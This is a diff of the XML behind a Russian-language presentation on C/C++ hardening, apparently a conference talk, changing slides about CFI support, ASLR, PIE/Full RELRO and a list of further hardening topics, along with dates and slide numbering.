+              <a:t>отсутствие поддержки в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Intel CET и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>AArch64 CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>дефолтно включён для пакетов в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Ubuntu</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Fedora</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> и</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>Debian</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LLVM CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>X86 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>AArch64 CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>ARM</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не использует никакой вариант </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CFI</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8C47595-0B65-4B0B-B52F-087D9E003C62}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>97</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="498133543"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide98.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB30E6FA-DA1C-4347-B182-90992B279AE4}"/>
               </a:ext>
             </a:extLst>
@@ -37420,7 +37577,7 @@
           <a:p>
             <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>97</a:t>
+              <a:t>98</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -294,7 +294,7 @@
           <a:p>
             <a:fld id="{A8F27B54-EFD4-4F1F-9CE4-9A3C368187A4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/24/2025</a:t>
+              <a:t>7/25/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -708,7 +708,7 @@
           <a:p>
             <a:fld id="{4E570717-CC08-42AC-84F3-7EB74EE2C2EE}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/24/2025</a:t>
+              <a:t>7/25/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -906,7 +906,7 @@
           <a:p>
             <a:fld id="{E850434B-ABC0-4013-A159-517880C2CE4B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/24/2025</a:t>
+              <a:t>7/25/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1114,7 +1114,7 @@
           <a:p>
             <a:fld id="{307E2251-42B8-4CD0-9F76-CE8A218C5A9B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/24/2025</a:t>
+              <a:t>7/25/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1312,7 +1312,7 @@
           <a:p>
             <a:fld id="{650366BD-2959-43A5-9C43-B178997CA9C1}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/24/2025</a:t>
+              <a:t>7/25/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1587,7 +1587,7 @@
           <a:p>
             <a:fld id="{44A443A2-278A-4AA2-A6FA-B813D9AB289B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/24/2025</a:t>
+              <a:t>7/25/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1852,7 +1852,7 @@
           <a:p>
             <a:fld id="{8DB96CD0-8DC9-4D9E-8F97-A64EB549E498}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/24/2025</a:t>
+              <a:t>7/25/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2264,7 +2264,7 @@
           <a:p>
             <a:fld id="{8728ABDD-F7C0-49E5-BDEF-78EEAB9D4FF0}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/24/2025</a:t>
+              <a:t>7/25/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2405,7 +2405,7 @@
           <a:p>
             <a:fld id="{1815E602-B233-4072-AF5E-EEC16D6A3250}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/24/2025</a:t>
+              <a:t>7/25/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2518,7 +2518,7 @@
           <a:p>
             <a:fld id="{B46368E2-0F8E-43F1-B205-4CE4ED81C818}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/24/2025</a:t>
+              <a:t>7/25/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2829,7 +2829,7 @@
           <a:p>
             <a:fld id="{A90826D4-3247-4C35-B745-95D9A6527E86}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/24/2025</a:t>
+              <a:t>7/25/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3117,7 +3117,7 @@
           <a:p>
             <a:fld id="{F697CA6C-CB8E-4E4E-A40B-CF748107F47F}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/24/2025</a:t>
+              <a:t>7/25/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3358,7 +3358,7 @@
           <a:p>
             <a:fld id="{486D2D92-9836-4BF5-99A8-6BBA488E0F07}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/24/2025</a:t>
+              <a:t>7/25/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -32278,13 +32278,17 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Другие дистрибутивы </a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Hardening </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в других популярных дистрибутивах </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -32293,13 +32297,28 @@
           </a:p>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Linux OS (Android, Windows, macOS, BSDs)</a:t>
-            </a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Hardening </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в других </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>OS (Android, Windows, macOS, BSDs)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Hardening </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в ядре операционной системы</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>
@@ -32343,6 +32362,25 @@
               <a:rPr lang="en-US" dirty="0"/>
               <a:t> (Java, Swift, Ada, Solidity, etc.)</a:t>
             </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Hardening </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>JIT-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>компиляторах</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -4998,7 +4998,17 @@
             <a:pPr lvl="2"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/usr/bin/python3</a:t>
+              <a:t>/usr/bin/python3 (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Launchpad #1452115</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -28881,8 +28881,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="9511553" y="662484"/>
-            <a:ext cx="2357718" cy="5693866"/>
+            <a:off x="9511553" y="416262"/>
+            <a:ext cx="2357718" cy="5940088"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -28963,7 +28963,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1600" dirty="0"/>
-              <a:t>PIE</a:t>
+              <a:t>PIE/Full RELRO</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" sz="1600" dirty="0"/>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -5,7 +5,7 @@
     <p:sldMasterId id="2147483648" r:id="rId1"/>
   </p:sldMasterIdLst>
   <p:notesMasterIdLst>
-    <p:notesMasterId r:id="rId100"/>
+    <p:notesMasterId r:id="rId101"/>
   </p:notesMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="280" r:id="rId2"/>
@@ -90,22 +90,23 @@
     <p:sldId id="356" r:id="rId81"/>
     <p:sldId id="330" r:id="rId82"/>
     <p:sldId id="345" r:id="rId83"/>
-    <p:sldId id="346" r:id="rId84"/>
-    <p:sldId id="359" r:id="rId85"/>
-    <p:sldId id="270" r:id="rId86"/>
-    <p:sldId id="347" r:id="rId87"/>
-    <p:sldId id="271" r:id="rId88"/>
-    <p:sldId id="274" r:id="rId89"/>
-    <p:sldId id="286" r:id="rId90"/>
-    <p:sldId id="278" r:id="rId91"/>
-    <p:sldId id="292" r:id="rId92"/>
-    <p:sldId id="298" r:id="rId93"/>
-    <p:sldId id="304" r:id="rId94"/>
-    <p:sldId id="310" r:id="rId95"/>
-    <p:sldId id="317" r:id="rId96"/>
-    <p:sldId id="322" r:id="rId97"/>
-    <p:sldId id="339" r:id="rId98"/>
-    <p:sldId id="338" r:id="rId99"/>
+    <p:sldId id="360" r:id="rId84"/>
+    <p:sldId id="346" r:id="rId85"/>
+    <p:sldId id="359" r:id="rId86"/>
+    <p:sldId id="270" r:id="rId87"/>
+    <p:sldId id="347" r:id="rId88"/>
+    <p:sldId id="271" r:id="rId89"/>
+    <p:sldId id="274" r:id="rId90"/>
+    <p:sldId id="286" r:id="rId91"/>
+    <p:sldId id="278" r:id="rId92"/>
+    <p:sldId id="292" r:id="rId93"/>
+    <p:sldId id="298" r:id="rId94"/>
+    <p:sldId id="304" r:id="rId95"/>
+    <p:sldId id="310" r:id="rId96"/>
+    <p:sldId id="317" r:id="rId97"/>
+    <p:sldId id="322" r:id="rId98"/>
+    <p:sldId id="339" r:id="rId99"/>
+    <p:sldId id="338" r:id="rId100"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -4584,7 +4585,12 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="407894" y="73305"/>
+            <a:ext cx="10515600" cy="1325563"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr/>
           <a:lstStyle/>
@@ -4613,10 +4619,15 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="407894" y="1331597"/>
+            <a:ext cx="7490012" cy="3222473"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -4631,25 +4642,48 @@
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Рандомизация расположения основных сегментов программы (стека, кучи, библиотек)</a:t>
             </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>на уровне ОС</a:t>
+            </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Осуществляется на уровне ОС</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>рандомизация </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>mmap)</a:t>
+              <a:t>Лишает хакера знания о том какие адреса возврата использовать в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack Overflow-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>атаках</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Сильно снижает риски любых buffer overflow атак </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>ROP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, heap overflow, etc.)</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
@@ -4657,49 +4691,6 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Лишает хакера знания о том какие адреса возврата использовать в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Overflow-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>атаках</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Сильно снижает риски любых buffer overflow атак </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>return-to-libc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> ROP</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, heap overflow, etc.)</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Пример </a:t>
             </a:r>
             <a:r>
@@ -4721,69 +4712,6 @@
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>Segmentation fault</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Одна из первых </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardening-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>защит</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>PaX </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>патч, 2001</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Linux, 2005</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Windows, 2007 (Vista)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Оверхед для 32-битных </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Windows </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>намного выше из-за архитектуры</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> DLL</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -4817,6 +4745,343 @@
               <a:t>14</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="6" name="Picture 5">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D663EF0-5CBB-4AAB-B7B1-F3B6C5D25C7B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8069931" y="1702818"/>
+            <a:ext cx="3714175" cy="2473699"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3CADF8D-887E-4563-B683-EF980519C4A0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="407894" y="4348409"/>
+            <a:ext cx="10515600" cy="3372876"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr marL="228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="1000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr marL="685800" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2400" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="2514600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl6pPr>
